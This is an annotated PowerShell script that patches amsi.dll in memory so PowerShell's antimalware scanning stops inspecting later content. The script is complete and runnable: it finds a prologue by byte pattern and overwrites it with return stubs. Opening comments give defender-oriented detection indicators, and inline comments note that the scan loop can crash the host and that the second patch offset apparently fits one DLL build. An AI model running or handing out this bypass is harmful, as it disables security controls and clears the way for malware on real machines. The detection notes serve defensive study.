# What the visible code does: loads amsi.dll into the current PowerShell
# process, resolves the exported DllCanUnloadNow, scans forward from that
# address for a function-prologue byte pattern, and overwrites the bytes it
# finds (plus a second location at a fixed offset) with a short return stub
# via VirtualProtect + Marshal.Copy. In other words it tampers with AMSI
# in-process so that content scanned after this point is no longer inspected.
#
# Defender notes (detection / mitigation, not part of the script's behavior):
# - This is a well-known in-memory AMSI-tampering pattern; the credit line below
#   names its lineage. Treat the sequence LoadLibrary("amsi.dll") ->
#   GetProcAddress -> VirtualProtect(PAGE_READWRITE) -> Marshal.Copy inside
#   powershell.exe as a high-fidelity indicator.
# - Script Block Logging (Microsoft-Windows-PowerShell/Operational, event 4104)
#   records this text before the patch takes effect, and Add-Type compiles a
#   throwaway assembly (csc.exe child process, files under the user temp dir),
#   both of which survive the bypass.
# - Memory-integrity checks that compare amsi.dll's loaded code pages with the
#   on-disk image will show the modified bytes; a PowerShell crash with amsi.dll
#   frames is also a signal, since the fixed-offset second patch appears to
#   assume one particular amsi.dll build (not verifiable from here).
function Invoke-AlokS-AvBypass {
    Write-Host "-- Bypassing Antivirus in Powershell --"
    Write-Host "--- Script Modified by Alok Saurabh ---"
    Write-Host "-- Credits to Paul Laîné & Avi Gimpel --"
    Write-Host ""

    # P/Invoke surface compiled at run time via Add-Type. Only the three
    # kernel32 exports used below are declared.
    $Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string lpLibFileName);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
    Add-Type $Kernel32

    # Byte-pattern scanner. FindAddress walks forward one byte at a time from
    # $address, comparing against $egg, and returns the address of the first
    # full match. Note the outer loop has no exit of its own: if the pattern is
    # never found the scan keeps reading until it reaches unmapped memory and
    # Marshal.ReadByte faults, taking the host process down with it.
    Class Hunter {
        static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
            while ($true) {
                [int]$count = 0
                while ($true) {
                    [IntPtr]$address = [IntPtr]::Add($address, 1)
                    If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
                        $count++
                        If ($count -eq $egg.Length) {
                            # Match complete: rewind to where the pattern began.
                            return [IntPtr]::Subtract($address, $egg.Length - 1)
                        }
                    }
                    Else {
                        break
                    }
                }
            }
            return $address
        }
    }

    # Anchor the search on an export that is easy to resolve; the target
    # function itself is located only by its prologue bytes, not by name.
    [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
    Write-Host "[+] AMSI DLL Handle: $hModule"
    [IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow")
    Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress"

    # Prologue pattern differs by bitness; selection is by pointer size.
    If ([IntPtr]::Size -eq 8) {
        Write-Host "[+] 64-bits process"
        [byte[]]$egg = [byte[]] (
            0x4C, 0x8B, 0xDC,       # mov r11,rsp
            0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx
            0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp
            0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi
            0x57,                   # push rdi
            0x41, 0x56,             # push r14
            0x41, 0x57,             # push r15
            0x48, 0x83, 0xEC, 0x70  # sub rsp,70h
        )
    }
    Else {
        Write-Host "[+] 32-bits process"
        [byte[]]$egg = [byte[]] (
            0x8B, 0xFF,       # mov edi,edi
            0x55,             # push ebp
            0x8B, 0xEC,       # mov ebp,esp
            0x83, 0xEC, 0x18, # sub esp,18h
            0x53,             # push ebx
            0x56              # push esi
        )
    }

    [IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)
    Write-Host "[+] Targeted address: $targetedAddress"

    # First patch: make the page writable (flNewProtect 4 = PAGE_READWRITE),
    # overwrite the located prologue with a return stub, then restore the
    # previous protection. The protection change on an amsi.dll code page is
    # the most reliable point at which to detect this.
    $oldProtectionBuffer = 0
    [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null
    $patch = [byte[]] (
        0x31, 0xC0, # xor rax, rax
        0xC3        # ret
    )
    [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)
    $a = 0
    [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null

    # Second patch at a hard-coded offset from the first. The offset is not
    # derived from anything in this file, so it presumably matches one specific
    # amsi.dll build; on another build it overwrites unrelated instructions.
    [int]$p = 27
    [IntPtr]$patchloc = [IntPtr]::Add($targetedAddress, $p)
    $oldProtectionBuffer1 = 0
    [Kernel32]::VirtualProtect($patchloc, [uint32]2, 4, [ref]$oldProtectionBuffer1) | Out-Null
    $patch1 = [byte[]] (
        0x31, 0xff, # xor edi, edi
        0x90        # nop
    )
    [System.Runtime.InteropServices.Marshal]::Copy($patch1, 0, $patchloc, 3)
    $a1 = 0
    [Kernel32]::VirtualProtect($patchloc, [uint32]2, $oldProtectionBuffer1, [ref]$a1) | Out-Null

    # Leftover debugging code (disabled): dumps the bytes after the patch.
    #[string]$bytes = ""
    #[int]$i = 0
    #while ($i -lt 31) {
    #    [IntPtr]$targetedAddress = [IntPtr]::Add($targetedAddress, $i)
    #    $bytes += "0x" + [System.BitConverter]::ToString([System.Runtime.InteropServices.Marshal]::ReadByte($targetedAddress)) + " "
    #    $i++
    #}
    #Write-Host "[+] new Bytes: $bytes"
}